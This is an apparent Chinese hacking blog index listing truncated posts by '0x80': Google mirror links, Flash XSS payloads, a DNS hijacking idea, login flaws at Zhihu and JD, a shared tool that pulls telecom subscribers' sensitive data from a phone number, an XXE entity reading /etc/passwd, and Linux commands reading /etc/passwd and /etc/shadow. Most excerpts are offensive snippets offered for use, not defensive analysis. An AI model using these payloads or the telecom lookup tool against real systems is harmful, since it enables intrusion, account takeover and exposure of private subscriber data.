谷歌原版镜像站
谷歌原版镜像站点① : http://guge.suanfazu.com/站点② : https://ipv6.google-api.ac.cn/站点③ : https://guge.schove.com/站点④ : https://google.uulucky.com谷歌学术镜像站点① : https://xue.glgoo.net(推荐)站点② : https://c3.zgdhhjha.com/scholar ...
三种flash xss跨站脚本攻击测试代码
三种flash xss跨站脚本攻击测试代码config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%2011...
真正的一键网站DNS域名劫持思路
真正的一键网站DNS域名劫持思路 作者:0x80首先获得一个基于query的接口验证证书接着返回登陆即可 然后进入DNS解析管理,把要劫持的IP地址,填入即可...
知乎某逻辑可导致登陆他人机构号
知乎某逻辑可导致登陆他人机构号
作者:0x80...
闲着没事,写了一个电信通用漏洞工具,支持某省所有电信查询
闲着没事,写了一个通用漏洞工具,支持某省所有电信查询只需要电信手机号码,无需登陆密码,即可查询到敏感信息 作者:0x80切勿用于非法用途 放个图https://pan.baidu.com/s/16wl__TTVObxLn6VgS2RFTg 提取码:b6zj ...
python简单爬虫实现cookie自动登陆
python简单爬虫实现cookie自动登陆 作者:0x80其实我们可以利用第三方的requests库来实现首先我们找到一个漏洞:登陆口的地方接着我们利用谷歌的f12模式,点击修改的时候,启动谷歌的检查这时候我们来到http://www.cmechina.net/cme/myHome.jsp页面接着我们看到页面的代码我们要利用的就是cookie代码接着我们直接启动pysharm破解版完了之后我们首先导入一个requests一个三方库impo...
浏览器,flash常用的XSS调用远程代码执行,实体注入(需要配合Charles分析)
<!ENTITY test SYSTEM "file:///etc/passwd"> encodeURIComponent('",a:(document.getElementsByTagName("script")[2].src=""),b:"') ?debug=(function()%7Blocation.href%3D'javascr...
linux常用命令
mkdir cat /etc/passwd(任意文件读取)cat /etc/shadow(有条件)touchps -autoprm shoudown -h nowsu roothistory !ID (比较好用)find / -name find / -name a*find /-name he* | grep wotar -czvf ver.gz vertar -zxvf /ho...
企查查 asdWakl
企查查 asdWakl...
京东某处XSS
京东某处XSS 作者:0x80...